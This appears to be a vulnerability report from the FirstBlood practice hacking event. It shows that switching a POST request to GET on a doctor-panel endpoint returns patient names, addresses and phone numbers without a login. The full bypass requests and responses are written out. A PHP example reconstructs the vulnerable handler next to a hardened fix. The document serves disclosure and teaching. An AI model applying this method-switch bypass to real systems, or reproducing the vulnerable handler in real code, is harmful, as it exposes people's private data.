FirstBlood-#114 IDOR at http://firstbloodhackers.com:49369/drpanel/drapi/qp.php can be used to query patient data without a doctor account



On 2021-05-10, 0xconft reported:

Hi there,

I found an IDOR at http://firstbloodhackers.com:49369/drpanel/drapi/qp.php where I can use this endpoint to query patient data without being logged in, by switching the HTTP method from POST to GET.

PoC: accessing via POST without a cookie returns nothing.

Request

POST /drpanel/drapi/qp.php HTTP/1.1
Host: firstbloodhackers.com:49369
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 8

name=sea

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 10 May 2021 12:16:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 0

Switch the HTTP method to GET without a cookie, and the patient data whose names contain "sea" will be returned:

GET /drpanel/drapi/qp.php?name=sea HTTP/1.1
Host: firstbloodhackers.com:49369
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 10 May 2021 12:17:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 228

Name: Sean zseano<br>Address: 53 Barkly Rd, Leeds, LS11 7ER<br>Telephone: 01394 389182<br>DOB: 13/03/37<hr>Name: Sean zseano<br>Address: 53 Barkly Rd, Leeds, LS11 7ER<br>Telephone: 01394 389182<br>DOB: 13/03/37<hr>

Best Regards, 0xconft

P1 CRITICAL

Endpoint: /drpanel/drapi/qp.php

Parameter: name

Payload: sea


FirstBlood ID: 12
Vulnerability Type: Auth issues

If the request method is changed from POST to GET, the endpoint /drapi/qp.php becomes available to ANY user due to an application logic error.
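The logic error described above, as an added example that is not the FirstBlood application's own code: a reconstruction of the handler shape that produces the observed behaviour, beside a hardened handler that authenticates before any method-specific branch. The `$_SESSION['doctor_id']` marker, the `$pdo` connection, the placeholder DSN and the `patients` table are assumptions.

```php
<?php
// Added example, not the FirstBlood application's source. It reconstructs the
// bug class in the report (a login check that only runs on the POST path) next
// to a hardened handler. Hypothetical assumptions: $_SESSION['doctor_id'] is
// set at doctor login, $pdo is a PDO connection, and a `patients` table exists.

function query_patients(PDO $pdo, string $name): array {
    // Prepared statement; the report does not show the original query.
    $stmt = $pdo->prepare(
        'SELECT name, address, telephone, dob FROM patients WHERE name LIKE ?');
    $stmt->execute(['%' . $name . '%']);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Vulnerable shape, consistent with the PoC: POST without a session yields an
// empty 200 response, while GET never reaches the session check at all.
function vulnerable_qp(PDO $pdo): array {
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        if (empty($_SESSION['doctor_id'])) {
            return [];                              // Content-Length: 0, as observed
        }
        return query_patients($pdo, $_POST['name'] ?? '');
    }
    return query_patients($pdo, $_GET['name'] ?? '');   // unauthenticated path
}

// Hardened handler: authenticate before any method-specific logic, allow only
// the intended method, and read the parameter from that method's source only.
function hardened_qp(PDO $pdo): array {
    if (empty($_SESSION['doctor_id'])) {
        http_response_code(401);
        exit;
    }
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        http_response_code(405);
        header('Allow: POST');
        exit;
    }
    $name = trim((string) ($_POST['name'] ?? ''));      // never $_REQUEST
    return query_patients($pdo, $name);
}

session_start();
$pdo = new PDO('sqlite:/path/to/patients.db');          // placeholder DSN
foreach (hardened_qp($pdo) as $row) {                   // escape on output
    echo htmlspecialchars($row['name']), '<br>', htmlspecialchars($row['address']), '<hr>';
}
```

Because the session check runs before the method check, no request method can reach the query unauthenticated, which is the property a regression test for this finding should assert.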


Respect Earnt: 1500000
RESPECT ($RSP) is an experimental cryptocurrency based on the Ethereum blockchain with the mission to show respect to those who deserve it. We are testing it out on our FirstBlood hackevent.